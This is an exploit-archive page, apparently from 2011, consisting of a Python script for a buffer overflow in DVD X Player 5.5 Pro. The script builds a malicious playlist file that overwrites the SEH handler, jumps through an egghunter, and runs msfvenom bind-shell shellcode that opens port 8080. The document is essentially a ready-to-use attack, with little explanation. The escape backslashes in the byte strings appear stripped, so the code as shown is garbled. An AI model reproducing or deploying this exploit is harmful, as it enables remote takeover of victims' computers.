Home / exploits DVD X Player 5.5 Pro SEH Overwrite
Posted on 07 September 2011
# DVD X Player 5.5 Pro # Bypass ASLR by using non-aslr enabled module # SEH Overwrite # Egghunter is not needed as there is at least 2000 bytes for shellcode import sys print "====================================" print "DVD X Player 5.5 Pro Buffer Overflow" print " SEH Overwrite - Bypass ASLR " print " Written by Blake " print "====================================" # size = 325 bytes # ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b 'x00x0ax0dx1a' -f c shellcode=( "xbax16x44x8axd1xdbxd1xd9x74x24xf4x5dx29xc9xb1" "x4bx31x55x14x83xc5x04x03x55x10xf4xb1x76x39x71" "x39x87xbaxe1xb3x62x8bx33xa7xe7xbex83xa3xaax32" "x68xe1x5exc0x1cx2ex50x61xaax08x5fx72x1bx95x33" "xb0x3ax69x4exe5x9cx50x81xf8xddx95xfcxf3x8fx4e" "x8axa6x3fxfaxcex7ax3ex2cx45xc2x38x49x9axb7xf2" "x50xcbx68x89x1bxf3x03xd5xbbx02xc7x06x87x4dx6c" "xfcx73x4cxa4xcdx7cx7ex88x81x42x4ex05xd8x83x69" "xf6xafxffx89x8bxb7x3bxf3x57x32xdex53x13xe4x3a" "x65xf0x72xc8x69xbdxf1x96x6dx40xd6xacx8axc9xd9" "x62x1bx89xfdxa6x47x49x9cxffx2dx3cxa1xe0x8axe1" "x07x6ax38xf5x31x31x55x3ax0fxcaxa5x54x18xb9x97" "xfbxb2x55x94x74x1cxa1xdbxaexd8x3dx22x51x18x17" "xe1x05x48x0fxc0x25x03xcfxedxf3x83x9fx41xacx63" "x70x22x1cx0bx9axadx43x2bxa5x67xecx9ax81xdbx7b" "xdex35xc3xebx57xd3x91x1bx31x4bx0exdex66x44xa9" "x21x4dxf8x62xb6xdax16xb4xb9xdbx3cx96x16x74xd7" "x6dx75x41xc6x71x50xe2x9fxe6x2ex62xedx97x2fxaf" "x87x57xbax4bx0ex0fx52x51x77x67xfdxaax52xf3x34" "x3ex1dx6cx39xaex9dx6cx6fxa4x9dx04xd7x9cxcdx31" "x18x09x62xeax8dxb1xd3x5ex05xd9xd9xb9x61x46x21" "xecx73xbbxf4xc9xf1xcdx72x3ax3a") # 32 byte egghunter egghunter =( "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8" "x54x30x30x57" # egg - W00T "x8bxfaxafx75xeaxafx75xe7xffxe7") # overwrite EIP = 260 bytes # overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll] egg = "x54x30x30x57x54x30x30x57" buffer = "x41" * 608 next_seh = "xebx06x90x90" # jump forward 6 bytes seh = "xdbx2ax60x61" # pop/pop/ret nops = "x90" * 20 print "[+] Creating malicious plf" try: file = open("owned.plf","w") file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode) file.close() print "[+] File created successfully" raw_input("[+] Press any key to exit") except: print "[X] Error creating file!" sys.exit(0)
